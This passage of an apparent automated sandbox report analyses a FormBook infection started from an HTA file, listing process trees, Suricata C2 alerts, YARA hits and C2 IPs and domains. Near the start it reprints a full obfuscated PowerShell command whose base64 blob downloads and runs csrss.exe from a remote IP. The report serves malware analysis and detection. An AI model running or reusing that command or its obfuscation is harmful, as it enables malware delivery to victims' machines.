0x22+'))')))", CommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkx
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6920, ProcessName: svchost.exe

                        Data Obfuscation

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", ProcessId: 7232, ProcessName: csc.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-14T23:12:09.366509+020020507451Malware Command and Control Activity Detected192.168.2.449725192.197.113.15680TCP
                        2025-04-14T23:12:41.123738+020020507451Malware Command and Control Activity Detected192.168.2.44973013.248.169.4880TCP
                        2025-04-14T23:12:54.853195+020020507451Malware Command and Control Activity Detected192.168.2.449734209.74.80.15080TCP
                        2025-04-14T23:13:09.947822+020020507451Malware Command and Control Activity Detected192.168.2.44973838.181.35.14280TCP
                        2025-04-14T23:13:31.821216+020020507451Malware Command and Control Activity Detected192.168.2.449742172.67.207.8280TCP
                        2025-04-14T23:13:51.331799+020020507451Malware Command and Control Activity Detected192.168.2.44974613.248.169.4880TCP
                        2025-04-14T23:14:07.860712+020020507451Malware Command and Control Activity Detected192.168.2.44975013.248.169.4880TCP
                        2025-04-14T23:14:22.075458+020020507451Malware Command and Control Activity Detected192.168.2.449754104.21.41.22680TCP
                        2025-04-14T23:14:35.473738+020020507451Malware Command and Control Activity Detected192.168.2.4497583.33.130.19080TCP
                        2025-04-14T23:14:49.566183+020020507451Malware Command and Control Activity Detected192.168.2.449762104.21.33.13280TCP
                        2025-04-14T23:15:03.045223+020020507451Malware Command and Control Activity Detected192.168.2.44976613.248.169.4880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-14T23:11:22.059321+020020220501A Network Trojan was detected192.3.26.14380192.168.2.449714TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-14T23:11:22.335287+020020220511A Network Trojan was detected192.3.26.14380192.168.2.449714TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-14T23:12:09.366509+020028554651A Network Trojan was detected192.168.2.449725192.197.113.15680TCP
                        2025-04-14T23:12:41.123738+020028554651A Network Trojan was detected192.168.2.44973013.248.169.4880TCP
                        2025-04-14T23:12:54.853195+020028554651A Network Trojan was detected192.168.2.449734209.74.80.15080TCP
                        2025-04-14T23:13:09.947822+020028554651A Network Trojan was detected192.168.2.44973838.181.35.14280TCP
                        2025-04-14T23:13:31.821216+020028554651A Network Trojan was detected192.168.2.449742172.67.207.8280TCP
                        2025-04-14T23:13:51.331799+020028554651A Network Trojan was detected192.168.2.44974613.248.169.4880TCP
                        2025-04-14T23:14:07.860712+020028554651A Network Trojan was detected192.168.2.44975013.248.169.4880TCP
                        2025-04-14T23:14:22.075458+020028554651A Network Trojan was detected192.168.2.449754104.21.41.22680TCP
                        2025-04-14T23:14:35.473738+020028554651A Network Trojan was detected192.168.2.4497583.33.130.19080TCP
                        2025-04-14T23:14:49.566183+020028554651A Network Trojan was detected192.168.2.449762104.21.33.13280TCP
                        2025-04-14T23:15:03.045223+020028554651A Network Trojan was detected192.168.2.44976613.248.169.4880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-14T23:12:33.083914+020028554641A Network Trojan was detected192.168.2.44972713.248.169.4880TCP
                        2025-04-14T23:12:35.755099+020028554641A Network Trojan was detected192.168.2.44972813.248.169.4880TCP
                        2025-04-14T23:12:38.465069+020028554641A Network Trojan was detected192.168.2.44972913.248.169.4880TCP
                        2025-04-14T23:12:46.697722+020028554641A Network Trojan was detected192.168.2.449731209.74.80.15080TCP
                        2025-04-14T23:12:49.446257+020028554641A Network Trojan was detected192.168.2.449732209.74.80.15080TCP
                        2025-04-14T23:12:52.150705+020028554641A Network Trojan was detected192.168.2.449733209.74.80.15080TCP
                        2025-04-14T23:13:01.402509+020028554641A Network Trojan was detected192.168.2.44973538.181.35.14280TCP
                        2025-04-14T23:13:04.252907+020028554641A Network Trojan was detected192.168.2.44973638.181.35.14280TCP
                        2025-04-14T23:13:07.106660+020028554641A Network Trojan was detected192.168.2.44973738.181.35.14280TCP
                        2025-04-14T23:13:23.814623+020028554641A Network Trojan was detected192.168.2.449739172.67.207.8280TCP
                        2025-04-14T23:13:26.480508+020028554641A Network Trojan was detected192.168.2.449740172.67.207.8280TCP
                        2025-04-14T23:13:29.145020+020028554641A Network Trojan was detected192.168.2.449741172.67.207.8280TCP
                        2025-04-14T23:13:42.306386+020028554641A Network Trojan was detected192.168.2.44974313.248.169.4880TCP
                        2025-04-14T23:13:44.970327+020028554641A Network Trojan was detected192.168.2.44974413.248.169.4880TCP
                        2025-04-14T23:13:48.652717+020028554641A Network Trojan was detected192.168.2.44974513.248.169.4880TCP
                        2025-04-14T23:13:56.805364+020028554641A Network Trojan was detected192.168.2.44974713.248.169.4880TCP
                        2025-04-14T23:13:59.473474+020028554641A Network Trojan was detected192.168.2.44974813.248.169.4880TCP
                        2025-04-14T23:14:02.156332+020028554641A Network Trojan was detected192.168.2.44974913.248.169.4880TCP
                        2025-04-14T23:14:14.095681+020028554641A Network Trojan was detected192.168.2.449751104.21.41.22680TCP
                        2025-04-14T23:14:16.738102+020028554641A Network Trojan was detected192.168.2.449752104.21.41.22680TCP
                        2025-04-14T23:14:19.459034+020028554641A Network Trojan was detected192.168.2.449753104.21.41.22680TCP
                        2025-04-14T23:14:27.555993+020028554641A Network Trojan was detected192.168.2.4497553.33.130.19080TCP
                        2025-04-14T23:14:30.170089+020028554641A Network Trojan was detected192.168.2.4497563.33.130.19080TCP
                        2025-04-14T23:14:32.850234+020028554641A Network Trojan was detected192.168.2.4497573.33.130.19080TCP
                        2025-04-14T23:14:41.560742+020028554641A Network Trojan was detected192.168.2.449759104.21.33.13280TCP
                        2025-04-14T23:14:44.209657+020028554641A Network Trojan was detected192.168.2.449760104.21.33.13280TCP
                        2025-04-14T23:14:46.873394+020028554641A Network Trojan was detected192.168.2.449761104.21.33.13280TCP
                        2025-04-14T23:14:55.058847+020028554641A Network Trojan was detected192.168.2.44976313.248.169.4880TCP
                        2025-04-14T23:14:57.716275+020028554641A Network Trojan was detected192.168.2.44976413.248.169.4880TCP
                        2025-04-14T23:15:00.387331+020028554641A Network Trojan was detected192.168.2.44976513.248.169.4880TCP
                        2025-04-14T23:15:17.206850+020028554641A Network Trojan was detected192.168.2.449767144.76.229.20380TCP
                        2025-04-14T23:15:19.958060+020028554641A Network Trojan was detected192.168.2.449768144.76.229.20380TCP
                        2025-04-14T23:15:23.267775+020028554641A Network Trojan was detected192.168.2.449769144.76.229.20380TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-04-14T23:13:23.814623+020028563181A Network Trojan was detected192.168.2.449739172.67.207.8280TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Roaming\csrss.exeReversingLabs: Detection: 79%
                        Source: fgd.htaVirustotal: Detection: 42%Perma Link
                        Source: fgd.htaReversingLabs: Detection: 30%
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Submited SampleNeural Call Log Analysis: 99.8%
                        Source: Binary string: sysinfo.pdb source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: sysinfo.pdbGCTL source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: iaoqralA.pif, iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: q7C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.pdb source: powershell.exe, 00000003.00000002.1354721983.0000000005559000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdbGCTL source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1284975349.000000000088B000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3626732569.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000000.1622712741.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038054D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,12_2_038054D0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241C530 FindFirstFileW,FindNextFileW,FindClose,21_2_0241C530
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then xor eax, eax21_2_02409EC0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then mov ebx, 00000004h21_2_041C04E8

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.3.26.143:80 -> 192.168.2.4:49714
                        Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.3.26.143:80 -> 192.168.2.4:49714
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49730 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49730 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49725 -> 192.197.113.156:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49725 -> 192.197.113.156:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49734 -> 209.74.80.150:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49734 -> 209.74.80.150:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 172.67.207.82:80
                        Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49739 -> 172.67.207.82:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49738 -> 38.181.35.142:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49738 -> 38.181.35.142:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49762 -> 104.21.33.132:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 104.21.33.132:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49728 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49736 -> 38.181.35.142:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49733 -> 209.74.80.150:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49746 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49746 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49727 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49750 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49750 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 104.21.33.132:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 172.67.207.82:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 104.21.41.226:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49732 -> 209.74.80.150:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 144.76.229.203:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 104.21.41.226:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49731 -> 209.74.80.150:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49729 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49758 -> 3.33.130.190:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 144.76.229.203:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 172.67.207.82:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49735 -> 38.181.35.142:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 144.76.229.203:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 38.181.35.142:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 104.21.33.132:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49758 -> 3.33.130.190:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 172.67.207.82:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 172.67.207.82:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 104.21.41.226:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 104.21.33.132:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49754 -> 104.21.41.226:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49754 -> 104.21.41.226:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 3.33.130.190:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49766 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49766 -> 13.248.169.48:80
                        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 13.248.169.48:80
                        Source: DNS query: www.computational360.xyz
                        Source: DNS query: www.royalbond.xyz
                        Source: DNS query: www.genericagi.xyz
                        Source: DNS query: www.031233793.xyz
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
